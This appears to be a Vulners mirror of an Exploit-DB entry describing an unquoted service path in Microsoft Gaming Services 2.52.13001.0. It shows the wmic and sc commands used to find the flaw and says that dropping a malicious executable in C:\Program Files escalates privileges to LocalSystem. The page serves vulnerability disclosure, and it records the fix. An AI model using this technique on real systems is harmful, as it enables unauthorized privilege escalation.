Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path

🗓️ 21 Feb 2022 00:00:00Reported by Johto RobbieType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 224 Views

Microsoft Gaming Services 2.52.13001.0 Unquoted Service Path Privilege Escalatio

Code
# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Step to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services
        GamingServices           C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe



                                                                        Auto

Gaming Services
        GamingServicesNet        C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe



                                                                     Auto

C:\Users\Bang's>sc qc "GamingServices"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices

        TYPE               : 210  WIN32_PACKAGED_PROCESS

        START_TYPE         : 2   AUTO_START

        ERROR_CONTROL      : 0   IGNORE

        BINARY_PATH_NAME   : C:\Program
Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe

        LOAD_ORDER_GROUP   :

        TAG                : 0

        DISPLAY_NAME       : Gaming Services

        DEPENDENCIES       : staterepository

        SERVICE_START_NAME : LocalSystem

This application have no quote . And it contained in C:\Program Files. Put
mot malicious aplication with name "progarm.exe"

Stop & Start: GamingServices. "progarm.exe" will be execute

#Exploit:

An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, Integrity and Availability.

#Timeline
May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
21 Feb 2022 00:00Current
7.4High risk
Vulners AI Score7.4
microsoft gaming servicesunquoted service pathprivilege escalationwindows 10vulnerabilityconfidentialityintegrityavailabilitymicrosofttimeline
224